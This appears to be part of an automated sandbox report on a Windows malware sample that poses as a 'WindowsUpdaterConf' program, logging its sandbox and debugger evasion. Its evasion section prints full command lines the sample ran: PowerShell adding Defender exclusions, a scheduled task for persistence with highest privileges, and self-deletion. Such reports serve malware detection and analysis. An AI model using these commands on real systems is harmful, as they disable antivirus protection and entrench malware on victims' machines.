Source: C:\Users\user\WindowsUpdaterConf.exe; Memory allocated: 4970000 memory reserve | memory write watch
Source: C:\Users\user\WindowsUpdaterConf.exe; Memory allocated: 1720000 memory reserve | memory write watch
Source: C:\Users\user\WindowsUpdaterConf.exe; Memory allocated: 3130000 memory reserve | memory write watch
Source: C:\Users\user\WindowsUpdaterConf.exe; Memory allocated: 5130000 memory reserve | memory write watch
Source: C:\Users\user\WindowsUpdaterConf.exe; Memory allocated: 1900000 memory reserve | memory write watch
Source: C:\Users\user\WindowsUpdaterConf.exe; Memory allocated: 38B0000 memory reserve | memory write watch
Source: C:\Users\user\WindowsUpdaterConf.exe; Memory allocated: 2050000 memory reserve | memory write watch
Source: C:\Users\user\WindowsUpdaterConf.exe; Memory allocated: 1990000 memory reserve | memory write watch
Source: C:\Users\user\WindowsUpdaterConf.exe; Memory allocated: 3350000 memory reserve | memory write watch
Source: C:\Users\user\WindowsUpdaterConf.exe; Memory allocated: 5350000 memory reserve | memory write watch
Source: C:\Users\user\WindowsUpdaterConf.exe; Memory allocated: 1800000 memory reserve | memory write watch
Source: C:\Users\user\WindowsUpdaterConf.exe; Memory allocated: 3170000 memory reserve | memory write watch
Source: C:\Users\user\WindowsUpdaterConf.exe; Memory allocated: 5170000 memory reserve | memory write watch
Source: C:\Users\user\WindowsUpdaterConf.exe; Memory allocated: 3000000 memory reserve | memory write watch
Source: C:\Users\user\WindowsUpdaterConf.exe; Memory allocated: 3030000 memory reserve | memory write watch
Source: C:\Users\user\WindowsUpdaterConf.exe; Memory allocated: 5030000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\file.exe; Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\file.exe; Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\file.exe; Thread delayed: delay time: 599875
Source: C:\Users\user\Desktop\file.exe; Thread delayed: delay time: 599765
Source: C:\Users\user\Desktop\file.exe; Thread delayed: delay time: 599656
Source: C:\Users\user\Desktop\file.exe; Thread delayed: delay time: 599546
Source: C:\Users\user\Desktop\file.exe; Thread delayed: delay time: 599421
Source: C:\Users\user\Desktop\file.exe; Thread delayed: delay time: 599312
Source: C:\Users\user\Desktop\file.exe; Thread delayed: delay time: 599202
Source: C:\Users\user\Desktop\file.exe; Thread delayed: delay time: 599093
Source: C:\Users\user\Desktop\file.exe; Thread delayed: delay time: 598984
Source: C:\Users\user\Desktop\file.exe; Thread delayed: delay time: 598875
Source: C:\Users\user\Desktop\file.exe; Thread delayed: delay time: 598765
Source: C:\Users\user\Desktop\file.exe; Thread delayed: delay time: 598656
Source: C:\Users\user\Desktop\file.exe; Thread delayed: delay time: 598546
Source: C:\Users\user\Desktop\file.exe; Thread delayed: delay time: 598437
Source: C:\Users\user\Desktop\file.exe; Thread delayed: delay time: 598324
Source: C:\Users\user\Desktop\file.exe; Thread delayed: delay time: 598218
Source: C:\Users\user\Desktop\file.exe; Thread delayed: delay time: 598109
Source: C:\Users\user\Desktop\file.exe; Thread delayed: delay time: 597999
Source: C:\Users\user\Desktop\file.exe; Thread delayed: delay time: 597813
Source: C:\Users\user\Desktop\file.exe; Thread delayed: delay time: 597531
Source: C:\Users\user\Desktop\file.exe; Thread delayed: delay time: 597406
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\file.exe; Window / User API: threadDelayed 6473
Source: C:\Users\user\Desktop\file.exe; Window / User API: threadDelayed 3337
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 5899
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 3871
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 7101
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 2525
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 7217
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 989
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 8207
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 1297
Source: C:\Users\user\Desktop\file.exe TID: 6740; Thread sleep count: 238 > 30
Source: C:\Users\user\Desktop\file.exe TID: 6660; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 2132; Thread sleep time: -18446744073709540s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 2132; Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 2132; Thread sleep time: -599875s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 2132; Thread sleep time: -599765s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 2132; Thread sleep time: -599656s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 2132; Thread sleep time: -599546s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 2132; Thread sleep time: -599421s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 2132; Thread sleep time: -599312s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 2132; Thread sleep time: -599202s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 2132; Thread sleep time: -599093s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 2132; Thread sleep time: -598984s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 2132; Thread sleep time: -598875s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 2132; Thread sleep time: -598765s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 2132; Thread sleep time: -598656s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 2132; Thread sleep time: -598546s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 2132; Thread sleep time: -598437s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 2132; Thread sleep time: -598324s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 2132; Thread sleep time: -598218s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 2132; Thread sleep time: -598109s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 2132; Thread sleep time: -597999s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 2132; Thread sleep time: -597813s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 2132; Thread sleep time: -597531s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 2132; Thread sleep time: -597406s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6684; Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2132; Thread sleep count: 7101 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1136; Thread sleep count: 2525 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7116; Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3412; Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2336; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\file.exe TID: 1076; Thread sleep count: 197 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6544; Thread sleep count: 8207 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4856; Thread sleep count: 1297 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6184; Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3736; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\file.exe TID: 6372; Thread sleep count: 214 > 30
Source: C:\Users\user\WindowsUpdaterConf.exe TID: 2208; Thread sleep count: 213 > 30
Source: C:\Users\user\WindowsUpdaterConf.exe TID: 6328; Thread sleep count: 229 > 30
Source: C:\Users\user\WindowsUpdaterConf.exe TID: 2356; Thread sleep count: 196 > 30
Source: C:\Users\user\WindowsUpdaterConf.exe TID: 4624; Thread sleep count: 142 > 30
Source: C:\Users\user\WindowsUpdaterConf.exe TID: 6392; Thread sleep count: 172 > 30
Source: C:\Users\user\Desktop\file.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\file.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\WindowsUpdaterConf.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\file.exe; Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe; File Volume queried: C:\ FullSizeInformation
Source: Amcache.hve.29.dr; Binary or memory string: VMware
Source: Amcache.hve.29.dr; Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.29.dr; Binary or memory string: vmci.syshbin
Source: Amcache.hve.29.dr; Binary or memory string: VMware, Inc.
Source: Amcache.hve.29.dr; Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.29.dr; Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.29.dr; Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.29.dr; Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.29.dr; Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: file.exe, 00000001.00000002.4158174681.0000000000DE1000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllip?
Source: Amcache.hve.29.dr; Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.29.dr; Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.29.dr; Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.29.dr; Binary or memory string: vmci.sys
Source: Amcache.hve.29.dr; Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.29.dr; Binary or memory string: vmci.syshbin`
Source: WindowsUpdaterConf.exe, 00000028.00000002.3653291877.0000000003182000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: vmware
Source: Amcache.hve.29.dr; Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.29.dr; Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.29.dr; Binary or memory string: VMware20,1
Source: Amcache.hve.29.dr; Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.29.dr; Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.29.dr; Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.29.dr; Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.29.dr; Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.29.dr; Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.29.dr; Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.29.dr; Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.29.dr; Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.29.dr; Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: WindowsUpdaterConf.exe, 00000028.00000002.3653291877.000000000317C000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: VIRTUALavmwarecVirtualBoxd69#116#127#115#82#122#122#56#114#122#122114#120#101#102#111
Source: Amcache.hve.29.dr; Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\file.exe; Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe Code function: 0_2_061C2E08 CheckRemoteDebuggerPresent,0_2_061C2E08
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\file.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\file.exe Process queried: DebugPort
Source: C:\Users\user\WindowsUpdaterConf.exe Process queried: DebugPort
Source: C:\Users\user\WindowsUpdaterConf.exe Process queried: DebugPort
Source: C:\Users\user\WindowsUpdaterConf.exe Process queried: DebugPort
Source: C:\Users\user\WindowsUpdaterConf.exe Process queried: DebugPort
Source: C:\Users\user\WindowsUpdaterConf.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\file.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\file.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\WindowsUpdaterConf.exe Process token adjusted: Debug
Source: C:\Users\user\WindowsUpdaterConf.exe Process token adjusted: Debug
Source: C:\Users\user\WindowsUpdaterConf.exe Process token adjusted: Debug
Source: C:\Users\user\WindowsUpdaterConf.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\file.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\WindowsUpdaterConf.exe'
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\WindowsUpdaterConf.exe'
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Users\user\Desktop\file.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c timeout /t 1 && DEL /f file.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'file.exe'
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\WindowsUpdaterConf.exe'
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WindowsUpdaterConf.exe'
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WindowsUpdaterConf" /tr "C:\Users\user\WindowsUpdaterConf.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
